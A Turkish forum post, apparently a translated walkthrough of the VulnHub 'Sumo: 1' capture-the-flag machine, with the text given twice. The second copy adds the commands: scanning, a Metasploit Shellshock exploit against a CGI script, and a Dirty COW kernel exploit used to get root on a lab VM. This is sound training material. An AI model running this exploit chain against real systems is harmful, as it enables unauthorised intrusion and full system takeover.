İndirme linki: https://www.vulnhub.com/entry/sumo-1,480/
Network Tarama
Netdiscover kullanarak hedef makine için ağımızı tarayarak başlıyoruz.
Hedef makine "192.168.1.104"de aktifmiş. IP'yi Nmap taramasından geçirelim ve çalışan servisleri ve açık portları var mı diye bakalım.
Enumeration
Tarama işlemi bize iyi ve kullanışlı bir çok bilgi verdi lakin göze çarpanlar açık olan 22 ve 80 portlar oldu. Araştırmaya 80 portundan başlayalım ve orada neler bulabileceğimize bakalım.
Bu sayfadan pek bir şey çıkacak gibi gözükmüyor. En iyisi Nikto tarama yapalım ve sayfayı daha fazla kavramaya çalışalım.
Nikto taramaları, uygulamada "/cgi-bin/" dizinini arar. İleri bir kontrolde uygulamada shellshock'a karşı açık olduğunu gördük. Exploit'leme zamanı.
Exploit'leme
Terminal açıp Métasploit framework'ü yüklemek için msfconsole yazalım ve aşağıdaki modülü kullanalım. Bu modül, HTTP_USER_AGENT çevre değişkenini kötücül bir fonksiyon tanımına ayarlayarak Apache webserver'daki CGI script'lerini hedefler.
Makinenin işletim sistemini öğrenmek için sysinfo komutunu çalıştırdık ve Ubuntu 12.04 olduğunu öğrendik. Bu tip eski sistemlerin genelde zafiyetli kernelleri olur. DIRTYCOW denemeliyiz.
Ayrıcalık Yükseltme
Exploit'i host makinenin içine indirdim ve sonrasında exploit'i çalıştırmadan evvel derledim. Şimdi şu komut lazım:
Sonrasında o remote shell'deki derlenmiş dosyayı root almak için yükledik.
Oluşturulan shell ayrıcalıkları yükselticek. Root bayrağını okumak için, bu shell'i düzgün bir shell'e dönüştüreceğiz. Sonrasında Dirty Cow exploit tarafından oluşturulan dosyaları kullanıp root olarak giriş yapacağız.
Böylelikle bayrağımızı yakalamış oluruz.
Kaynak: https://www.hackingarticles.in/sumo-1-vulnhub-walkthrough/ + https://www.turkhackteam.org/international-forum/1920898-sumo-1-ctf-walkthrough.html
Network Tarama
Netdiscover kullanarak hedef makine için ağımızı tarayarak başlıyoruz.
Kod:
netdiscover
Hedef makine "192.168.1.104"de aktifmiş. IP'yi Nmap taramasından geçirelim ve çalışan servisleri ve açık portları var mı diye bakalım.
Kod:
nmap -p- -A 192.168.1.104
Enumeration
Tarama işlemi bize iyi ve kullanışlı bir çok bilgi verdi lakin göze çarpanlar açık olan 22 ve 80 portlar oldu. Araştırmaya 80 portundan başlayalım ve orada neler bulabileceğimize bakalım.
Bu sayfadan pek bir şey çıkacak gibi gözükmüyor. En iyisi Nikto tarama yapalım ve sayfayı daha fazla kavramaya çalışalım.
Kod:
nikto -h http://192.168.1.104
Nikto taramaları, uygulamada "/cgi-bin/" dizinini arar. İleri bir kontrolde uygulamada shellshock'a karşı açık olduğunu gördük. Exploit'leme zamanı.
Exploit'leme
Terminal açıp Métasploit framework'ü yüklemek için msfconsole yazalım ve aşağıdaki modülü kullanalım. Bu modül, HTTP_USER_AGENT çevre değişkenini kötücül bir fonksiyon tanımına ayarlayarak Apache webserver'daki CGI script'lerini hedefler.
Kod:
use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf exploit(apache_mod_cgi_bash_env_exec) >set rhost 192.168.1.104
msf exploit(apache_mod_cgi_bash_env_exec) >set lhost 192.168.1.112
msf exploit(apache_mod_cgi_bash_env_exec) >set targeturi /cgi-bin/test
msf exploit(apache_mod_cgi_bash_env_exec) >expoit
Makinenin işletim sistemini öğrenmek için sysinfo komutunu çalıştırdık ve Ubuntu 12.04 olduğunu öğrendik. Bu tip eski sistemlerin genelde zafiyetli kernelleri olur. DIRTYCOW denemeliyiz.
Ayrıcalık Yükseltme
Exploit'i host makinenin içine indirdim ve sonrasında exploit'i çalıştırmadan evvel derledim. Şimdi şu komut lazım:
Kod:
gcc -pthread c0w.c -o c0w
Sonrasında o remote shell'deki derlenmiş dosyayı root almak için yükledik.
Kod:
cd /tmp
upload /root/c0w .
./c0w
Oluşturulan shell ayrıcalıkları yükselticek. Root bayrağını okumak için, bu shell'i düzgün bir shell'e dönüştüreceğiz. Sonrasında Dirty Cow exploit tarafından oluşturulan dosyaları kullanıp root olarak giriş yapacağız.
Kod:
shell
python -c 'import pty; pty.spawn("/bin/sh")
./c0w
/usr/bin/passwd
cd /root
cat root.txt
Böylelikle bayrağımızı yakalamış oluruz.
Kaynak: https://www.hackingarticles.in/sumo-1-vulnhub-walkthrough/ + https://www.turkhackteam.org/international-forum/1920898-sumo-1-ctf-walkthrough.html
Moderatör tarafında düzenlendi: